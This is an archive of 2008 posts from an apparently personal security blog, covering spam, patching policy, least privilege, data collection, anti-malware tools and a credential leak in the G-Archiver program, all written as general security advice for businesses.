Monday, March 31, 2008

ORDB Gone bad?

I received an email this morning from a collegue giving me a heads up on ORDB queries returning everything as an open relay.

According to the WHOIS information the domain has been registered since june 2001, and was last updated january of 2007, and the domain expires (currently) in June of 2016.

I'm wondering if 1 the DNS information was changed to get people to stop using their site, or if it had been hacked by the spammers to stop people from trusting Open relay type services.

So if you're having problemssending or receiving mail, as always check your configs and in this case please remove from your list of open relay databases, as they ceased operating in December of 2006.

-- Tim Krabec

Friday, March 28, 2008

the HoneySpam project is now live

I would like to thanks Subdriven & Panaman from the irc channel for volunteering to help with this project.

The basic goal is to find out why people click on links in spam and develop better training. I started this project less than 24 hours ago (at time of posting) and I am pleased to have others showing interest. Stay tuned.

-- Tim Krabec

Thursday, March 27, 2008

No Patch for Human Stupidity

Sender: Not recognized
Subject: Nonsense
Body: Link only

Pop Quiz:
A. Click the link
B. Delete the Message
C. Send it to Spam
D. Adjust the Spam filters on the server

If you picked anything but A you are smarter than Bob's co-worker.

What makes people do stuff like this? Why? Would they walk up to a building in a strange neighborhood and open the door and walk in, just because? Are these the same people who go to the wrong address and wonder why the people who they are looking for are not there?

Well to answer those questions I got the brilliant Idea to start a new Honey project. Coming soon. I envision this project as a collection point for surveys where fake spam is sent to co-workers or clients to find out why people are clicking on links in spam, so that we can develop better methods of training.

Tim Krabec

Wednesday, March 26, 2008

"Having the talk" now means 2 things
Having children used to mean having "the talk" about the birds and the bees, now there is a second talk that you should have, about posting stuff to the internet. You can have the exact same problem with employees, and their blogging or online activities. When you have this talk, it should not just be about you, your job, the company, or laws, it should concern what can potentially happen to your child or employee. You need to arm them with knowledge, and explain consequences for their actions. While it is important to realize that people have differences of opinion, it is also important for both sides to realize that they both may have a seat at the table. Weather it is your child or an employee that has a problem with an action the company is doing, both can have devastating effects on you, the company, the employee or child.
Having open lines of communication can help you either defuse a situation, or properly prepare for what is coming. Let's take an example of a company clearing some land for a new building. The company may have great plans, for this location, but be too blinded by their vision, to realize that they are not taking into account the natural beauty of the site, it's historic significance, or it's natural value. By talking to their family, friends and employees they may realize that changing their plans, they can avoid negative publicity, or alienation of their employees. We probably do not need to discuss how not allowing a child or an employee the ability to express their views on a certain topic can back fire.

With the above being said it is certainly inappropriate for an employee, or a child to release damaging information (less whistle blowing) just because they disagree. And it is defiantly illegal for an employee to release IP or other proprietary information that a company has. I'm not sure on the legality of the child releasing proprietary information, but I'm pretty sure that the allowing the child to gain that information is probably the same as releasing it to others. So it is imperative you talk to the appropriate people, and discuss business only with those people you are supposed to be discussing it with.

-- Tim Krabec

Tuesday, March 25, 2008

Just write the patch, we'll decide if it is critical

According to and From computer world "Microsoft Corp's security team today acknowledged that it knew of bugs in its Jet Database Engine as far back as 2005 but did not patch the problems because it thought it had blocked the obvious attack vectors." Mitigation of threats happens on the front lines, by IT in the trenches. Firewalls, IPS/IDS are all mitigation, software and hardware vendors need to actually fix the problem not mitigate it, at least not as a long term fix.

IMHO patches should be as numerous as press releases if not more so. Patches should be painless to install across 1 or 1 million machines, and not require a reboot. If there is a critical issue that needs to be patched, involve a trusted community, where mitigation can be developed, while you (the vendor) writes the patch, and tests it.

A single patch to fix a single issue may not be the most prudent or timely solution. Take the case where a quick patch fixes the problem for a large number of machines, but in a small number it does nothing, and in the rare case it crashes the service. In the example case I just described, release the patch, show where it works and where it does not, then allow it to be deployed where it works, and fix the rest quickly. For in the case of a network worm that spreads very rapidly, I'd rather see a patch released hours after it was discovered that would immunize 35+% of the systems than a patch that is 99%+ effective weeks later.

-- Tim Krabec

Monday, March 24, 2008

The FBI can listen to you via your phone when it is off?

I serious believe/hope that there are some facts wrong in that report. I can understand that the microphone can be turned on with the phone on the phone is on, but not in an active call. But unless the phone is in some kind of sleep/hibernation mode I seriously doubt that the microphone could be activated remotely, unless it was programmed or designed to do so.

-- Tim Krabec

Sizing people up

With people being an important part of any company you need to know some tips on sizing up your employees, vendors and customers. When I read the following article I realized that there were many ideas that would not just face my wife and I when our kids started dating (some sooner than later) but also affect business on a day to day basis.

Extending the concepts brought forth in the article. Is the person dressed appropriately for their line of work? Did a high priced contractor come dressed appropriately, or did they literally drop everything to help you out in an emergency? How about demeanor or their vehicle? Does that bargain basement company employee show up in a flashy vehicle? Have you done background checks on the employee or checked references? Is the business listed with the local BBB, have you called the references provided or better yet, found references of your own?

-- Tim Krabec

Saturday, March 22, 2008

Least privilege

It is easier to start with full restrictions then allow escalation as needed than to start with full privileges then take them away. As an experiment you can give free coffee away at the office, noting that it is for a "limited time", but when the time comes people will still expect the free coffee. Now compare that to providing coffee on special occasions, or occasionally as it is needed. The same concept applies with access to files and rights on their PC. If people have access to install any program they want or access any web site they want and you restrict their access in any manner they will most likely view it as you are taking a right away from them.

You need to create policies that have expectations of business security, and ownership or buy in from the employees. Give them training on computer security where there is WIIFM, What's in it for me, and the training can be something that is used at home. Make sure to provide both a carrot and a stick. Make sure the wording is positive rather than negative, restricting the "user privileges" on your machine make it tougher for spy ware to spread or even get installed in the first place" rather than something more like "we're taking away administrator/power user rights for security".

Set an appropriate time to set up the new privileges or make it happen. Hiring a new computer company or using your existing company to do an analysis or some basic reporting on your systems can show where the deficiencies exist. After a virus or spy ware outbreak would be a perfect time to review your current plan and implement something new, especially if users were adversely affected during the outbreak. Make sure IT is not the cause of things being taken away and that they are not seen as the "bad guys" in your organization.

--Tim Krabec

Thursday, March 20, 2008

In other news

I have been elected Vice President of the South Florida Chapter of the ISSA

-- Tim Krabec

Sunday, March 16, 2008

Why do they need this?

When filling out forms for anything from joining a web site to registering software to opening a credit card to taking an "anonymous" survey we are asked many questions. When were you born, how old are you, what is your sex, are you married, do you own or rent, what is your sign, what is your highest level of education, how many kids, what is your race, your religion, your nationality, your drivers license, etc. I got to wonder why do I need to give this information out, I know several people who lie on the demographic information. I've been ignoring all information that is not required. But the question is why is this being collected?

Businesses need to ask them selves what type of information do we collect and why? How long to we keep it? How is the information used and what would happen if it were stolen? The last litmus test I would add to this would be do I want this information collected, and probably sold.

I'm not sure what information, if any, beyond name, address, phone number, advertising method and sales volume and computer stats I want to keep about my customers. I also think I'm going to maintain an active list, a hold list, and finally a purge list. The only other information I'm going to maintain is a list of customers who do not wish to have email or mail sent to them.

-- Tim Krabec

Would you use Ritalin for a headache?

Probably not. Each drug has it's own purpose, so do different "Anit-" applications. Anti virus programs such as AVG , AVAST, Symantec and McAfee anti viruses are all good at removing viruses. But simply not effective at removing spy ware, Trojans, or ad ware unless they happen function like viruses. Just as getting rid of athletes foot, requires different medicine than controlling ADHD, or even getting rid of a bacterial infection require different medicines.
Removing different types of malware (viruses, spy ware, ad ware and Trojans) require different kinds of software. Much like Ritalin anti virus & anti spy ware should be used all the time. While other programs can be used on an as needed basis. Some programs need only to be run occasionally or when suspicious activity is found.

--Tim Krabec

Tuesday, March 11, 2008

My 1st pod cast.

I would like to thank Martin McKeay ( and Rick Mogull ( for allowing me to be a guest on their podcast Network Security Podcast (episode 97). It was weird being involved in a podcast that I have listened to over the past year or so, since it sounds like I am listening to an episode, until they ask and Tim what do you have to say about...

-- Tim Krabec

Monday, March 10, 2008

It's my computer... I will install any program I want to.

Brief: The program G-Archiver mails the username and password of every person who use(d)(s) it to a specific gmail email address, and to make matters worse the username and password of the account they everybody's information was sent to was also in the code.

There has been some discussion about the intentions of the programmer, whether the intent was accidental or malicious, I'm hoping it was accidental. With that said it does not help the fact that the usernames and password of at least 1777 users of this program and gmail were potentially compromised. There are 2 lessons I would like to bring to peoples attention here:

1. Use a different password on every site you visit, or at the least use a group of passwords 1 or 2 for throw away registrations, ie local newspapers, national papers, other sites that do you would not give person/private information to. And then separate password for each banking site, financial institution, or shopping site. If I came across a set of usernames and passwords I would search the web for those usernames on various forums, myspace, facebook, etc and then I would try several of those combinations.

2. It is important that you know what programs you have on your computer, and that if you have and IT department or a computer guy/gal that they know what programs you have installed on your computer. Also when your resident IT/computer guy/gal tells you, or asks you not to install an application, it is generally not because they are being mean, they are trying to help keep your data and your computer safe.

-- Tim Krabec

Monday, March 3, 2008

The Admin, Bean Counter & Manager

It was a quiet day at work, when The Admin reads of a new threat poised to wreak havoc on networks world wide. Being the good admin, she spends some time researching the threat, and proposing a solution, with full redundancy. She then schedules a meeting with her manager and the bean counter. The bean counter immediately requests the system is cut to it's bare minimum, The Manager, who is happy that a solution exists, recommends not doing anything until it's necessary.

Sound familiar?

-- Tim Krabec